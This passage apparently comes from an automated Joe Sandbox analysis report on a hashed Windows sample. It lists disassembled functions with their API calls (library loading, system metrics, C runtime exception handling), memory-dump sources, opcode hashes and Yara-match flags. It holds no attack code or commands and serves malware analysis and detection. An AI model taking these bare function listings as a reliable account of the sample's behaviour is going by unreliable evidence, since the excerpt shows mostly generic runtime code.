                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                                                                                                                                                                                                                              Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                                                                                                                                                                                                                                                                                              Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                                                                                                                                                                                                                              Function 100152B4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a77029f59283c4afc38e459ca5b29238c6884d098e1e5420c53c581ecba7eff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0144B2209B26FEE61186B86CC0C1B338CDF452F67BE0325F4305E1D1EA72CD804560
                                                                                                                                                                                                                                                                                                                              Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                                                                                                                                                                                                                              Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                                                                                                                                                                                                                              Function 02835CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02831D66,00000000,00000000,?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue), ref: 02835D13
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue,0283E190,FlsSetValue,00000000,00000364,?,02835BC8), ref: 02835D1F
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue,0283E190,FlsSetValue,00000000), ref: 02835D2D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ec67ccf43a01ca9d71930157956dec432fcb11cdb45b516ed92b400d47f169e2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c2ff099f5ddcaf625ff0530c982793ccfdf96aed0b4591b629f6943bd5f619a2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec67ccf43a01ca9d71930157956dec432fcb11cdb45b516ed92b400d47f169e2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01D03EA522366BD7225A79DC8CB567758AF09BB57500E30F90ED7180D734E411CAE0
                                                                                                                                                                                                                                                                                                                              Function 10016C81 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue), ref: 10016CB3
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000,00000364,?,10016B4E), ref: 10016CBF
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000), ref: 10016CCD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ff803806bf35457a8c9509914e7b957bc79ab392df546f2ce6f943c9b73d3fe4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A012B32215233BBD721CBA98C84E667B99EF197E17324630FE86DB140D731D892C6E0
                                                                                                                                                                                                                                                                                                                              Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                                                                                                                                                                                                                              Function 1000BCDA Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 1000BCF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C329: ___AdjustPointer.LIBCMT ref: 1000C373
                                                                                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 1000BD08
                                                                                                                                                                                                                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 1000BD1A
                                                                                                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 1000BD3E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ee525c0efd99494f93368286b9b993f9fe821045e638fee8bb9f3aa3f758cd1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30014836000609BBEF129F55CC01EDE7BBAFF48794F118015FE1862124D772E8A1EBA0
                                                                                                                                                                                                                                                                                                                              Function 100049A0 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 219979c3f9182af5e0a522c4ab851fea51af6e4da579dc1b438f2ddc11bd8505
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0A7F76042050EBB08E774A85792B72C8DB252E0711033AF11BCB686FD32E8D48159
                                                                                                                                                                                                                                                                                                                              Function 1000C872 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 1000C872
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 1000C877
                                                                                                                                                                                                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 1000C87C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000D4B2: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 1000D4C3
                                                                                                                                                                                                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 1000C891
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
